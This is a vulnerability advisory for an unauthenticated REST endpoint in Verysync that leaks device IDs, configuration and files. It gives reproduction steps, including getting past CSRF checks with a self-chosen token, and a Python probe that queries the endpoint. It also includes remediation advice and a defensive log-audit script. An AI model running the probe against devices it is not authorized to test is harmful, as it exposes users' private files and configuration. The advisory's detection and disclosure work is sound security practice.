Verysync 微力同步 Information Disclosure Vulnerability in Web Administration Module
Vulnerability
A vulnerability allowing unauthorized access to sensitive information has been identified in Verysync 微力同步 versions through 2.21.3. The issue resides in the Web Administration Module: the REST endpoint '/rest/f/api/resources/f96956469e7be39d' is served by a handler that performs no authentication check. A remote attacker can therefore query it directly and retrieve confidential data such as device IDs, system configuration and synchronized files, which can then be used to stage further targeted attacks.
Impact
Exploitation of this vulnerability gives an unauthenticated remote attacker arbitrary file read on the affected device: synchronized files as well as sensitive system files can be traversed and read through the exposed endpoint.
Reproduction
The vulnerability can be reproduced by sending a GET request to the vulnerable endpoint '/rest/f/api/resources/f96956469e7be39d' without any credentials. Supplying a crafted CSRF token value in both the cookie and the corresponding request header is enough to get past the CSRF protection; a CSRF token only proves that the client can set its own cookie and is not a substitute for authentication, which is why it does not stop this request. Once the request is processed, the response contains sensitive information from the device, such as file paths and system configuration.
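The probe below reproduces the request shape described above and classifies the answer. It is an added example, not code from the advisory or from Verysync. The request follows the text (a plain GET with an attacker-chosen CSRF token sent in both cookie and header); the cookie and header names, the token value, and the response heuristics in assess() are assumptions and may need adjusting to the target.

```python
"""Unauthenticated probe for the endpoint described in the Reproduction step.

Added example, not part of the advisory or of Verysync. The cookie/header
names, the token value and the assess() heuristics are assumptions.
"""
import http.client
import json

ENDPOINT = "/rest/f/api/resources/f96956469e7be39d"

# Assumed names: the advisory only says the token travels "in the cookie and
# header"; replace with whatever the target actually expects.
CSRF_COOKIE_NAME = "CSRF-Token-VERYSYNC"
CSRF_HEADER_NAME = "X-CSRF-Token-VERYSYNC"
DUMMY_TOKEN = "probe-token"


def build_headers(token=DUMMY_TOKEN):
    """Headers for the probe: the same token in cookie and header, no credentials."""
    return {
        "Cookie": f"{CSRF_COOKIE_NAME}={token}",
        CSRF_HEADER_NAME: token,
        "Accept": "application/json",
    }


def assess(status, body):
    """Classify a response to the unauthenticated GET.

    'exposed'   -> HTTP 200 with a non-empty JSON document: the handler
                   answered without any authentication
    'protected' -> 401/403: an authentication check sits in front of it
    'unknown'   -> anything else (non-JSON body, redirect to a login page, ...)
    """
    if status in (401, 403):
        return "protected"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body)
    except ValueError:
        return "unknown"
    return "exposed" if data else "unknown"


def probe(host, port, timeout=5):
    """Send the GET and return (verdict, status, body). Needs network access."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", ENDPOINT, headers=build_headers())
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        return assess(resp.status, body), resp.status, body
    finally:
        conn.close()


if __name__ == "__main__":
    import sys

    verdict, status, body = probe(sys.argv[1], int(sys.argv[2]))
    print(f"{verdict} (HTTP {status}), {len(body)} bytes returned")
```

Run it as `python probe.py <host> <port>` against a host you are authorized to test. A 'protected' verdict only shows that some check is in front of the endpoint; a 200 with a populated JSON body is the condition the advisory describes.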
Remediation
Users are advised to enforce authentication on the Web Administration Module and to restrict access to the local host or to an allowlist of trusted devices, for example by binding the web interface to a loopback address or filtering it at the firewall or reverse proxy. Additionally, enable log auditing of access records and file read operations so that anomalous requests to the endpoint can be detected and responded to.
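The following script shows what the log-auditing recommendation looks like in practice: it scans access-log lines for successful hits on the vulnerable endpoint from clients outside an allowlist. This is an added example and not part of the advisory or of Verysync; it assumes the web module, or a reverse proxy in front of it, writes Common Log Format lines, and the sample lines and allowlist are constructed for illustration.

```python
"""Access-log audit for the endpoint named in the advisory.

Added example, not part of the advisory or of Verysync. Assumes Common Log
Format; the allowlist and SAMPLE_LOG are constructed.
"""
import ipaddress
import re

ENDPOINT = "/rest/f/api/resources/f96956469e7be39d"

# Common Log Format: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Hosts allowed to reach the web administration module (constructed allowlist).
ALLOWED_NETS = [
    ipaddress.ip_network("127.0.0.1/32"),
    ipaddress.ip_network("192.168.10.0/24"),
]


def is_allowed(ip):
    """True if the client address falls inside one of the allowlisted networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ALLOWED_NETS)


def find_suspicious(lines):
    """Return (ip, timestamp, status) for each successful request to ENDPOINT
    from outside the allowlist. A 200 for an unknown client is the signal that
    the unauthenticated handler served data."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if path != ENDPOINT:
            continue
        status = int(m.group("status"))
        if status == 200 and not is_allowed(m.group("ip")):
            hits.append((m.group("ip"), m.group("ts"), status))
    return hits


# Constructed sample log: one allowlisted hit, two external hits that were
# served, one external hit that was denied, and one unrelated request.
SAMPLE_LOG = [
    '192.168.10.5 - - [10/Jan/2024:09:00:01 +0000] "GET /rest/f/api/resources/f96956469e7be39d HTTP/1.1" 200 1843',
    '203.0.113.7 - - [10/Jan/2024:09:00:12 +0000] "GET /rest/f/api/resources/f96956469e7be39d HTTP/1.1" 200 1843',
    '203.0.113.7 - - [10/Jan/2024:09:00:13 +0000] "GET /rest/f/api/resources/f96956469e7be39d HTTP/1.1" 200 21012',
    '198.51.100.9 - - [10/Jan/2024:09:01:40 +0000] "GET /rest/f/api/resources/f96956469e7be39d HTTP/1.1" 403 0',
    '203.0.113.7 - - [10/Jan/2024:09:01:41 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, ts, status in find_suspicious(SAMPLE_LOG):
        print(f"ALERT {ts} {ip} read {ENDPOINT} (HTTP {status})")
```

Feed it the real log instead of SAMPLE_LOG and adjust ALLOWED_NETS to the networks that are supposed to reach the module; any remaining hit is a read of the endpoint that the access restriction above should have blocked.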
